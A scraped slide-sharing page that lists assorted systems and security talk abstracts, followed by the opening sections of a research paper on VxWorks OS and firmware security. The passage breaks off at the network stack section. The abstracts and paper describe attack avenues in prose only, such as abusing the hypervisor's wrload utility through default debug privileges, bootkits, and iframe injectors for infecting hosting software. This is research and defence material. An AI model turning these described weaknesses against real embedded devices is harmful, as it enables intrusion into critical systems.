The document discusses security issues related to the VxWorks operating system and firmware. It provides an overview of the VxWorks architecture and fault management system. It then analyzes vulnerabilities in the VxWorks OS security model, network stack, debugging interface, and firmware configuration. Finally, it discusses threats facing embedded devices like weak security practices.
Implementing SR-IOV failover for Windows guests during live migration - Yan Vugenfirer
Presentation from KVM Forum 2020.
In the past, there were several attempts to enable live migration for VMs that use SR-IOV NICs. We are going to discuss the recent development based on the SR-IOV failover feature in the virtio specification and its implementation for Windows guests. In this session, Annie Li and Yan Vugenfirer will provide an overview of the failover feature and discuss specifics of the Windows guest implementation.
High Performance Storage Devices in the Linux Kernel - Kernel TLV
Agenda:
In this talk we will present the Linux kernel storage layers and dive into blk-mq, a scalable, parallel block layer for high performance block devices, and how it is used to unleash the performance of NVMe, flash and beyond.
Speaker:
Evgeny Budilovsky, Kernel Developer at E8 Storage
https://www.linkedin.com/company/e8-storage
OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ... - The Linux Foundation
This presentation covers a real-world case study of Bitdefender Hypervisor Introspection (HVI) that is based on Xen Project software. On April 14th, The Shadow Brokers released the EternalBlue exploit toolkit, which exploited an SMBv1 vulnerability across a wide range of Windows operating systems. The exploit was most famously used as a propagation mechanism for the WannaCry ransomware. HVI prevented exploitation attempts with no prior knowledge of the exploit or underlying vulnerability. This talk will cover the exploit mechanism, how HVI detects its actions, and illustrate some of the advantages of HVI built through open source collaboration. Audience members will take away a better understanding of this type of exploit and of how hypervisor introspection, and a security-through-the-hypervisor approach in general, can help companies avoid these types of new exploits.
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct... - The Linux Foundation
Currently XSM is very limited and restrictive in its functionality:
1) one single big policy controls all domains,
2) reloading a new policy requires a host reboot,
3) multiple domains performing similar functions must be grouped under the same security label and type.
Anshul Makkar is going to present a talk discussing the ongoing work to overcome the above limitations. Some of the security features he will cover:
1) Interdomain communication
2) Creating secure stub domains.
3) Securing and segregating introspection domains.
[CB21] Appearances are deceiving: Novel offensive techniques in Windows 10/11... - CODE BLUE
In 2017, Microsoft announced the ARM version of Windows.
The number of devices running the ARM version of Windows, such as the Surface Pro X series and the HP ENVY x2, is increasing, and it is gradually becoming popular.
When using these ARM devices, there is a compatibility issue: existing x86/x64 applications cannot be used as-is.
However, this problem has been addressed by providing x86/x64 emulation capabilities.
In recent years, ARM64EC has been announced, allowing for the gradual migration of x64 applications to ARM.
The aggressive introduction of these compatibility technologies is a sign of Microsoft's strong will to promote the ARM version of Windows.
On the other hand, does the introduction of new compatibility technologies not also provide a new avenue of attack for attackers?
As far as we know, this point has not been discussed much so far.
Therefore, we reverse engineered the compatibility technology that exists in Windows on ARM and examined its exploitability.
We found that various techniques are available, such as code injection by modifying XTA cache files, and obfuscation by exploiting newly introduced relocation entries.
All of these techniques have in common the characteristic that the binary "appearance" and runtime behavior are different, making them difficult to detect and track.
In addition, some of the techniques can be widely exploited to interfere with static analysis or sandbox analysis.
Therefore, there is a high possibility that they will become a threat to the ARM version of Windows in the future.
In this presentation, we will explain the details of our new method and its features with demonstrations.
We hope that this presentation will be a good opportunity to develop and promote the security research of Windows on ARM.
The PoC code and detailed reverse engineering results will be available on GitHub.
XPDS16: A Paravirtualized Interface for Socket Syscalls - Dimitri Stiliadis, ... - The Linux Foundation
Docker and other container runtimes are gathering momentum and becoming the new industry standard for server applications. Linux namespaces, commonly used to run Docker apps, come with a large attack surface which is difficult to reduce. Intel’s Clear Containers use KVM to run containers as VMs to provide additional isolation. It is possible to provide VM-like isolation for containers without sacrificing performance.
This talk focuses on the benefits of using Xen to provide an execution environment for Docker apps. The presentation starts by listing the requirements of this environment. It explains why monitoring container syscalls is important and what its security benefits are. The talk introduces a new paravirtualized protocol to virtualize IP sockets and provides the design and implementation details. The presentation clarifies the impact of the new protocol from a security perspective. The discussion concludes by comparing performance figures with the traditional PV network frontend and backend drivers in Linux, explaining the reasons for any performance gaps.
In this talk Liran will discuss interrupt management in Linux: effective handling, and how to defer work using tasklets, workqueues and timers. We'll learn how to handle interrupts in userspace, talk about the performance and latency aspects of each method, and look at some examples from the kernel source.
Liran is the CTO at Mabel technology and co-founder of DiscoverSDK - Software Libraries directory and DiscoverCloud - Business Apps directory.
More than 20 years of training experience including courses in: Linux, Android, Real-time and Embedded systems, and many more.
The lecture by Norman Feske for Summer Systems School'12.
Genode Compositions
SSS'12 - Education event, organized by ksys labs[1] in 2012, for students interested in system software development and information security.
Genode[2] - The Genode operating-system framework provides a uniform API for applications on top of 8 existing microkernels/hypervisors: Linux, L4ka::Pistachio, L4/Fiasco, OKL4, NOVA, Fiasco.OC, Codezero, and a custom kernel for the MicroBlaze architecture.
1. http://ksyslabs.org/
2. http://genode.org
Bootkit threats have always been a powerful weapon in the hands of cybercriminals, allowing them to establish a persistent and stealthy presence in their victims' systems. The most recent notable spike in bootkit infections was associated with attacks on 64-bit versions of the Microsoft Windows platform, which restrict the loading of unsigned kernel-mode drivers. However, these bootkits aren't effective against UEFI-based platforms. So, are UEFI-based machines immune to bootkit threats (or would they be)?
The aim of this presentation is to show how bootkit threats have evolved over time and what we should expect in the near future. Firstly, we will summarize what we've learned about the bootkits seen in the wild targeting the Microsoft Windows platform: from TDL4 and Rovnix (which was used by the Carberp banking trojan) up to Gapz (which employs one of the stealthiest bootkit infection techniques seen so far). We will review their infection approaches and the methods they have employed to evade detection and removal from the system.
Secondly, we will look at the security of the increasingly popular UEFI platform from the point of view of the bootkit author, as UEFI is becoming a target of choice for researchers in offensive security, and proof-of-concept bootkits targeting Windows 8 OS using UEFI have already been released. We will focus on various attack vectors against UEFI and discuss available tools and what measures should be taken to mitigate against them.
The lecture by Norman Feske for Summer Systems School'12.
Genode Architecture
SSS'12 - Education event, organized by ksys labs[1] in 2012, for students interested in system software development and information security.
Genode[2] - The Genode operating-system framework provides a uniform API for applications on top of 8 existing microkernels/hypervisors: Linux, L4ka::Pistachio, L4/Fiasco, OKL4, NOVA, Fiasco.OC, Codezero, and a custom kernel for the MicroBlaze architecture.
1. http://ksyslabs.org/
2. http://genode.org
Kernel Recipes 2015: How to choose a kernel to ship with a product - Anne Nicolas
It’s often difficult to select a kernel for products that are shipped to customers. Several branches exist, bugs need to be avoided as much as possible and updates must be rare enough not to upset customers. All this must be true during all the product’s lifecycle. This presentation will show how the quality of stable kernels evolves over time and when it’s best to pick them and how to help improve them.
Willy Tarreau, HAProxy Technologies
The lecture by Norman Feske for Summer Systems School'12.
Genode Components
SSS'12 - Education event, organized by ksys labs[1] in 2012, for students interested in system software development and information security.
Genode[2] - The Genode operating-system framework provides a uniform API for applications on top of 8 existing microkernels/hypervisors: Linux, L4ka::Pistachio, L4/Fiasco, OKL4, NOVA, Fiasco.OC, Codezero, and a custom kernel for the MicroBlaze architecture.
1. http://ksyslabs.org/
2. http://genode.org
A talk presented at the Automotive Grade Linux All-Members meeting on September 8, 2015. The focus is on why AGL should adopt systemd, and it highlights two of the more difficult integration issues that may arise while doing so. The embedded SVG image, courtesy Marko Hoyer of ADIT, is at http://she-devel.com/2015-07-23_amm_demo.svg
XPDS14 - Zero-Footprint Guest Memory Introspection from Xen - Mihai Dontu, Bi... - The Linux Foundation
This presentation will detail a practical approach to memory introspection of virtual machines running on the Xen hypervisor with no in-guest footprint. The functionality makes use of the mem-event API with a number of improvements which enable the proper tracking of guest OS activity. The technology created on top of this Xen API opens the door for several immediate applications, including: rootkit detection and prevention, detection and action on several categories of malware, and event source information for low-level post-event forensics and correlation based on real event data during events.
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel - The Linux Foundation
In the era of cloud computing, security is becoming more and more critical for customers. In the existing HW/SW architecture the hypervisor does not protect tenants against the cloud provider, and thus against the supplied operating system and hardware. Intel Software Guard Extensions (SGX) provides a mechanism that addresses this scenario. It aims at protecting user-level software from attacks by other processes, the operating system, and even physical attackers. Intel SGX makes such protection possible through the use of an enclave, a protected area in a userspace application whose code and data cannot be accessed directly by any software from outside. This presentation intends to give you an introduction to Intel SGX technology, including what it is, how it works, and the existing SW stack that enables SGX for customers, followed by an introduction to our work to support SGX virtualization in the Xen hypervisor, including the high-level design, current status and future plan.
The ultimate guide to software updates on embedded linux devices - Mender.io
Slides from my talk at NDC Techtown 2019.
Abstract:
Software updates have for a long time been a mess, consisting of “homegrown” solutions specific to a certain project, with very little reuse between projects and very little collaboration in our community to solve these complex problems. Luckily for us that time is over: the community around this topic has grown over the last couple of years and is still growing as demand increases with the growth of IoT and OTA firmware updates (which introduce even more complexity).
There are now well established, “battle tested” open-source solutions that we can collaborate on to make the complexity of software updates manageable. We are heading for a time where a quality Board Support Package should provide a software update implementation, because the problem really should be solved at this level instead of being handed over to application developers, who have limited knowledge of the low-level architecture of an embedded device.
In this talk Mirza will present some of the challenges of doing software updates on embedded systems. He will also present the available open-source projects that can be used to solve these challenges, such as mender.io, SWUpdate, RAUC and more.
This presentation talks about Real Time Operating Systems (RTOS). Starting with fundamental concepts of OS, this presentation deep dives into Embedded, Real Time and related aspects of an OS. Appropriate examples are referred with Linux as a case-study. Ideal for a beginner to build understanding about RTOS.
Virtual Machines Security Internals: Detection and Exploitation - Mattia Salvi
This paper is an analysis of the current state of virtual machine security, showcasing how features have been turned into attack vectors that can pose threats to real enterprise-level infrastructures. Despite the few real-world scenarios that have actively exploited security holes, they remain one of the most dangerous threats organizations have to look out for.
Customers are using NSX to drive business benefits as shown in the figure below. The main themes for NSX deployments are Security, IT automation and Application Continuity.
Figure 3: NSX Use Cases
• Security:
NSX can be used to create a secure infrastructure, which can create a zero-trust security model. Every virtualized workload can be protected with a full stateful firewall engine at a very granular level. Security can be based on constructs such as MAC, IP, ports, vCenter objects and tags, active directory groups, etc. Intelligent dynamic security grouping can drive the security posture within the infrastructure.
NSX can be used in conjunction with third-party security vendors such as Palo Alto Networks, Check Point, Fortinet, or McAfee to provide a complete DMZ-like security solution within a cloud infrastructure.
NSX has been deployed widely to secure virtual desktops, some of the most vulnerable workloads residing in the data center, and to prohibit desktop-to-desktop hacking.
• Automation:
VMware NSX provides a full RESTful API to consume networking, security and services, which can be used to drive automation within the infrastructure. IT admins can reduce the tasks and cycles required to provision workloads within the datacenter using NSX.
NSX is integrated out of the box with automation tools such as vRealize Automation, which can provide customers with a one-click deployment option for an entire application, including the compute, storage, network, security and L4-L7 services.
Developers can use NSX with the OpenStack platform. NSX provides a Neutron plugin that can be used to deploy applications and topologies via OpenStack.
• Application Continuity:
NSX provides a way to easily extend networking and security to up to eight vCenters, either within or across data centers. In conjunction with vSphere 6.0, customers can easily vMotion a virtual machine across long distances, and NSX will ensure that the network and the firewall rules are consistent across the sites. This essentially maintains the same view across sites.
NSX Cross-vCenter Networking can help build active-active data centers. Customers are using NSX today with VMware Site Recovery Manager to provide disaster recovery solutions. NSX can extend the network across data centers and even to the cloud to enable seamless networking and security.
Software Defined Everything is an infrastructure that virtualizes compute, network, and storage resources and delivers them as a service. Rather than being managed through the hardware components of the infrastructure, the compute, network, and storage infrastructure is controlled and automated by intelligent software running on the Lenovo x86 platform.
Control of Communication and Energy Networks Final Project - Service Function... - Biagio Botticelli
Final Project of the Control of Communication and Energy Networks course of the Master Degree in Engineering in Computer Science at University of Rome "La Sapienza".
The technical report introduces the concepts of Service Function Chaining (SFC) and Network Function Virtualization (NFV), analyzing an approach to merge the two technologies.
Docker moves very fast, with an edge channel released every month and a stable release every 3 months. Patrick will talk about how Docker introduced Docker EE and a certification program for containers and plugins with Docker CE and EE 17.03 (from March), the announcements from DockerCon (April), and the many new features planned for Docker CE 17.05 in May.
This talk will be about what's new in Docker and what's next on the roadmap.
Emerging Trends in Online Social Networks Malware - Aditya K Sood
Emerging trends in Social Networks Malware.
Social networks, such as Facebook, Twitter, and others, pose a grave threat to the security and privacy of users. This presentation highlights the malware infection strategies used by attackers to infect social networking websites and addresses security from the user's perspective, outlining effective, secure steps that can reduce the impact of malware infections.
Enfilade: Tool to Detect Infections in MongoDB Instances - Aditya K Sood
Attackers are targeting MongoDB instances for conducting nefarious operations on the Internet. Cybercriminals target exposed MongoDB instances and trigger infections at scale to exfiltrate data, destroy data, and extort money via ransom.
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
Elasticsearch infections are rising exponentially. The adversaries are exploiting open and exposed Elasticsearch interfaces to trigger infections in the cloud and non-cloud deployments. During this talk, we will release a tool named "STRAFER" to detect potential infections in the Elasticsearch instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected Elasticsearch instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases.
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
Bot herders deploy Command and Control (C&C) panels for commanding and collecting exfiltrated data from the infected hosts on the Internet. To protect C&C panels, bot herders deploy several built-in (software-centric) protection mechanisms to restrict direct access to these C&C panels. However, there exist fundamental mistakes in the design and deployment of these C&C panels that can be exploited to take complete control. This talk discusses about the methodology of launching reverse attacks on the centralized C&C panels to derive intelligence that can be used to build automated solutions. This research reveals how to detect vulnerabilities and configuration flaws in the remote C&C panels and exploit them by following the path of penetration testing. This talk is derived from the real time research in which several C&C panels were targeted and intelligence was gathered to attack the next set of C&C panels. A number of case studies will be discussed to elaborate step-by-step process of attacking and compromising C&C panels. This talk also demonstrates the use of automated tools authored for making the testing easier for the researchers.
DOWNLOAD from this link : http://secniche.org/blackhat-2014/
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
C-SCAD is an information gathering and penetration testing tool written to assess the security issues present in the Web-X (Internet Explorer-based web interface) client used to interact with the ClearSCADA server. WebX client is hosted on the embedded web server which is shipped as a part of complete ClearSCADA architecture. Primarily, the WebX client is restricted to perform any configuration changes but it can reveal potential information about the ClearSCADA server and associated components. Insecure deployments of WebX client can reveal potential information about the various functions such as alarm pages, SQL lists, and diagnostic checks including various reports.
In this article, we discuss the design of an iframe injector used to infect web-hosting software such as cPanel in an automated manner. Several different iframe injector designs exist, but we look at one of the most basic: NiFramer.
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
Cyber criminals are using advanced attacks to exploit online banking systems and services to covertly steal money. This paper describes the tactics currently used by cyber criminals to conduct cyber bank robbery
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
The Android platform has been plagued by malware for the past several years. Despite all attempts to detect and mitigate malicious applications on Android, malware is still flying under our radar and getting on our devices and causing millions of users financial and data loss every year. Additionally, the malware analysis community is at a large disagreement on how Android malware should be classified. In this talk, we’ll dive into the tactics, tools and procedures used by Android malware today, including several case studies of exceptional malware samples. By analyzing real code used by malware in the wild, we’ll be able to show the advancements in Android malware from a design perspective.
GridMate - End to end testing is a critical piece to ensure quality and avoid...ThomasParaiso2
End to end testing is a critical piece to ensure quality and avoid regressions. In this session, we share our journey building an E2E testing pipeline for GridMate components (LWC and Aura) using Cypress, JSForce, FakerJS…
Communications Mining Series - Zero to Hero - Session 1DianaGray10
This session provides introduction to UiPath Communication Mining, importance and platform overview. You will acquire a good understand of the phases in Communication Mining as we go over the platform with you. Topics covered:
• Communication Mining Overview
• Why is it important?
• How can it help today’s business and the benefits
• Phases in Communication Mining
• Demo on Platform overview
• Q/A
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionAggregage
Join Maher Hanafi, VP of Engineering at Betterworks, in this new session where he'll share a practical framework to transform Gen AI prototypes into impactful products! He'll delve into the complexities of data collection and management, model selection and optimization, and ensuring security, scalability, and responsible use.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfPeter Spielvogel
Building better applications for business users with SAP Fiori.
• What is SAP Fiori and why it matters to you
• How a better user experience drives measurable business benefits
• How to get started with SAP Fiori today
• How SAP Fiori elements accelerates application development
• How SAP Build Code includes SAP Fiori tools and other generative artificial intelligence capabilities
• How SAP Fiori paves the way for using AI in SAP apps
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
Digging Inside the VxWorks OS and Firmware
The Holistic Security
Aditya K Sood (0kn0ck)
SecNiche Security Labs (http://www.secniche.org)
Email: adi ks [at] secniche.org
1 Acknowledgement
I sincerely thank my friends and security researchers for sharing their thoughts on VxWorks.
• Jeremy Collake (Bitsum)
• Edgar Barbosa (COSEINC)
• Luciano Natafrancesco (Netifera)
In addition, I would also like to thank HD Moore for finding vulnerabilities in VxWorks OS. Sincere gratitude to all the researchers who are engaged in constructive research for the security community. I am also grateful to Dr. Richard J Enbody for supporting me in work related to computer security.
Lastly, I sincerely want to thank CIGTIAL Inc. and my security group at SecNiche Security Labs for supporting me in doing continuous security research. I also thank all the conference organizers who invited me to deliver talks and have shown faith in me.
2 Abstract
VxWorks is one of the most widely adopted embedded operating systems. In this paper, we conduct a detailed study of the security model of the VxWorks OS and firmware in order to understand the potential impact of security vulnerabilities on its functioning.
3 Introduction
VxWorks is a portable real-time operating system developed by Wind River Systems. It can be optimized to run under three different configurations. VxWorks has been used successfully in military and civilian avionics, including the Boeing 787 and 747-8 and the Airbus A400M, as well as in on-ground avionic systems such as civilian and military radar stations. It is also found in non-safety-critical applications where performance is at a premium; Linksys wireless routers, for example, run VxWorks as part of their firmware. The different configurations let developers take control of an application through effective debugging and fault handling mechanisms. The standard development suite for VxWorks is Wind River Workbench, an Eclipse-based Java platform. This IDE (Integrated Development Environment) is used for code compilation, analysis, editing, and debugging.
First, VxWorks can be optimized to run as a closed system with protection between processes running in kernel and user mode and with effective error management. Second, it can be optimized to run as a networking platform with functionality similar to that of a network OS, such as firewalls and security protocols. Third, it can be implemented as a safety-critical or hard real-time system that meets the highest levels of safety and security requirements.
OS security is critical because the OS is the base software that supports all other applications. Vulnerabilities in an operating system can have a dramatic impact on the applications running on it. If a system is compromised through an OS-level vulnerability such as a kernel compromise, an attacker can take over the system completely by installing malicious programs or backdoors. The OS can then be used for nefarious purposes such as stealing sensitive data from the machine and executing remote commands, and an attacker can abuse system access rights to make applications execute maliciously. Analysis of OS security benchmarks therefore gives better insight into the robustness of the operating system and helps in understanding the serious repercussions of persistent vulnerabilities.
This paper presents an extensive study of the fault management and security model of VxWorks, covering the following topics:
• A detailed analysis of the protection mechanisms and of the vulnerabilities that result in rooting VxWorks. A 3COM SIPX phone running VxWorks has been used for this analysis.
• A detailed discussion of the security model of the VxWorks OS firmware running on the Linksys WRT54GS v6 router.
• An analysis of potential attacks on VxWorks based on existing security vulnerabilities.
4 Architectural Overview
VxWorks is built around a highly advanced real-time kernel that supports multicore architectures. A broad comparison against the requirements of high availability systems [1,2] shows that VxWorks is capable of executing multitasking processes based on symmetric multiprocessing. Multiple cores share segments of main memory through a preemptive, round-robin scheduling algorithm with fast interrupt response. In general, deadlocks are avoided by placing appropriate bounds on the priority inheritance protocols, and shared resources are managed using mutual exclusion semaphores as well as binary and counting semaphores. The POSIX real-time threads API is fully implemented, which is crucial for robust performance and memory protection. In VxWorks, user applications run in their own isolated program space and do not conflict with the kernel. VxWorks provides interprocess communication, including support for the Transparent Inter-Process Communication (TIPC) protocol and distributed message queuing. Priority inheritance in VxWorks is performed by the mutex [14]. VxWorks is fully ANSI C compliant and offers extended C++ features such as exception handling and template support. Several additional mechanisms for handling system errors and facilitating recovery from them are present to ensure robust, crash-free operation. VxWorks also maintains a robust file system. Development for VxWorks and image modification are performed using Tornado [18]. Wind River Systems provides a core API that is shared between the certified and non-certified versions of the OS. The VxWorks application boot sequence is presented in Figure 1.
Figure 1: VxWorks Application Boot Sequence
5 Fault Management
In VxWorks, faults are handled at a global level by special components explicitly designed for handling faults. These components do not allow faults to propagate, executing appropriate remedial measures instead. Handling faults in a centralized manner results in a consistent fault management system throughout the system and also makes debugging easier. The VxWorks FMS (Failover Management System) uses this mechanism to monitor the status of various hardware devices. VxWorks does not have built-in message passing capabilities; instead, it is considered a function-call based operating system. VxWorks is explicitly based on the system call exception procedure because this yields the highest possible performance, whereas message passing is considered slow because it increases the degree of separation among processes.
5.1 Protection Domains, Subsystems and Isolation
VxWorks implements the concept of "protection domains", which is explicitly required to develop a hardware-enforced protection model. This enhances the protection model by inserting protection boundaries into the program for strong system partitioning, rather than relying on legacy protection models such as trap-based system calls or intra-system message passing. It is thus possible to separate applications, shared libraries, shared data and system software to varying degrees in order to attain the desired level of isolation and protection.
VxWorks uses inbuilt extensions that comprise a number of subsystems arranged in layers around the RTOS (Real Time Operating System) core. These subsystems are not isolated and have dependencies among different software components. The VxWorks OS is designed as a layered model. VxWorks can be made extensible by using a run-time extension called VxFusion, which allows interprocessor communication for distributed working across the network. Apart from this, system resources are assigned to protection domains for controlled execution as per the requirements, and VxWorks manages these explicit associations of resources with protection domains.
5.2 Understanding OMS and AMS
VxWorks AE (an OS based on VxWorks 5.x) also has a Foundation HA extension that takes care of high-level availability services such as fault detection and hot swapping. The HA package consists of the AMS (Alarm Management System) and the OMS (Object Management System) as part of the fault management framework. The OMS presents hardware and software objects in an abstract way, representing them in a hierarchical tree model that shows the dependencies among them.
The OMS can initiate an alarm, but the alarm handler operations are restricted by the relationship tree. The AIL (Alarm Injection Layer) is considered the EP (Entry Point) into the AMS. The alarm handler resides at the top of the tree, and the resulting alarm propagates from bottom to top in the relationship tree. The mapping between alarm handlers and sources can be either one-to-many or many-to-one. The actions resulting from faults are defined by the developer. However, if no alarm handler is associated with an alarm source, the event is not considered a fault and the AMS does not control it. Components that detect the presence of faults and generate alarms are termed hardened objects. These objects are defined in the system with generic timeout, exit and error handling procedures for every service in order to prevent locking of the whole system; device drivers, for example, are considered hardened objects. The AMS provides a more robust way of handling and dealing with faults, which in turn improves the reliability and functionality of the system.
6 Virtualization - Embedded Hypervisor
With the advent of virtualization, a VxWorks guest OS has been introduced that works with the support of hypervisors. It works in the same fashion as the native VxWorks OS. This step enhances functionality and helps developers design centralized systems by replacing multiple CPU boards with a single board. Figure 2 shows a high-level view of hypervisor support for the VxWorks guest OS.
Figure 2: VxWorks Hypervisor in Action
6.1 Hypervisor and Virtual Board Security
One of the basic security issues in implementing the hypervisor is the appropriate configuration of the virtual boards on which the application is going to be executed. The VxWorks hypervisor supports the wrload utility, which can be used to perform illegitimate operations. wrload (supported only for 32-bit OS at present) is capable of loading any ELF image onto any other virtual board on the system, and it is also possible to change the contents of any virtual board dynamically. A further security challenge is that wrload requires debug privileges in order to perform its operations, and by default VxWorks systems have debug mode enabled. Misconfigured parameters and insufficient permission checks may therefore result in exploitation of virtual boards and the hypervisor through debug privileges.
7 VxWorks OS Security Model and Fallacies
As discussed earlier, VxWorks implements the concept of protection domains in order to separate different software components. Each protection domain inherits an individual MMU (Memory Management Unit) and a private address space, and the MMU is responsible for checking the validity of addresses within protection domains. However, the VxWorks design is flexible: design engineers can specify the usage of different objects in the software components by defining execution boundaries at run time. This means that a developer is able to create an OEP (Object Entry Point) in the kernel domain according to the requirements. In general, this design is not robust from a security point of view.
7.1 Stack Overflow Detection and Protection
In general, when tasks are spawned in VxWorks, the stack is by default filled with a special value (0xeeeeeeee). The memory model of applications designed for VxWorks requires careful decisions, and VxWorks provides inbuilt functions to detect the memory usage of the various tasks in an application. The function checkStack() [10] raises a warning if any task exceeds its memory limit, i.e. its stack allocation. checkStack() works correctly only when tasks run in a mode where the VX_NO_STACK_FILL option is not set, since it relies on the fill pattern to determine how much of the stack has been used.
In advanced versions such as VxWorks AE, all non-kernel tasks are protected by guard pages. If a stack overflow occurs inadvertently and the task tries to enter the guard pages, an MMU exception occurs, which signals the stack overflow. However, this protection is not stringent enough because the guard pages are only 4KB in size; VxWorks does provide the TASK_EXTRA_GUARD_PAGES configuration parameter to extend the guard page limit.
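The fill-pattern check described above, as an added example that is not VxWorks code: a constructed 256-byte task stack filled with 0xeeeeeeee, a simulated task that consumes part of it, and the scan that a checkStack()-style routine relies on, together with the VX_NO_STACK_FILL caveat (an unfilled stack makes the scan report full usage). All helper names are assumptions made for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Added example, not VxWorks code: a simulated task stack shows how a
 * fill-pattern check derives stack usage. The stack grows downward, so
 * unused words keep the fill value 0xeeeeeeee and the first non-fill word
 * scanned from the low end marks the high-water mark. */

#define STACK_WORDS 64            /* constructed: 256-byte task stack */
#define STACK_FILL  0xeeeeeeeeU   /* VxWorks default stack fill value */

typedef struct {
    uint32_t words[STACK_WORDS];  /* words[0] is the lowest address */
} task_stack_t;

/* Emulates task spawn with stack filling enabled. */
void stack_init(task_stack_t *s)
{
    for (size_t i = 0; i < STACK_WORDS; i++)
        s->words[i] = STACK_FILL;
}

/* Emulates task spawn with VX_NO_STACK_FILL: memory keeps whatever was
 * there before (zeros here), so nothing distinguishes unused words. */
void stack_init_unfilled(task_stack_t *s)
{
    memset(s->words, 0, sizeof s->words);
}

/* Emulates a task pushing `bytes` of frames onto its stack, from the top
 * down; anything beyond STACK_WORDS would run off the low end. */
void stack_use(task_stack_t *s, size_t bytes)
{
    size_t words = (bytes + 3) / 4;
    if (words > STACK_WORDS)
        words = STACK_WORDS;
    for (size_t i = 0; i < words; i++)
        s->words[STACK_WORDS - 1 - i] = 0xc0de0000U + (uint32_t)i;
}

/* Returns the high-water mark in bytes, as a fill-pattern scan would. */
size_t stack_high_water(const task_stack_t *s)
{
    size_t i = 0;
    while (i < STACK_WORDS && s->words[i] == STACK_FILL)
        i++;
    return (STACK_WORDS - i) * 4;
}

/* Returns 1 when the lowest word was overwritten: the task ran out of
 * stack, and a guard page below it would have raised an MMU exception. */
int stack_overflowed(const task_stack_t *s)
{
    return s->words[0] != STACK_FILL;
}

/* Fresh filled stack, `bytes` consumed, usage reported by the scan. */
size_t demo_usage_after(size_t bytes)
{
    task_stack_t s;
    stack_init(&s);
    stack_use(&s, bytes);
    return stack_high_water(&s);
}

/* Same scenario, overflow flag instead of usage. */
int demo_overflow_after(size_t bytes)
{
    task_stack_t s;
    stack_init(&s);
    stack_use(&s, bytes);
    return stack_overflowed(&s);
}

/* Same scenario on an unfilled stack: the scan finds no fill pattern at
 * all and reports the whole stack as used, whatever the real usage. */
size_t demo_usage_unfilled(size_t bytes)
{
    task_stack_t s;
    stack_init_unfilled(&s);
    stack_use(&s, bytes);
    return stack_high_water(&s);
}
```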
7.2 VxWorks Network Stack
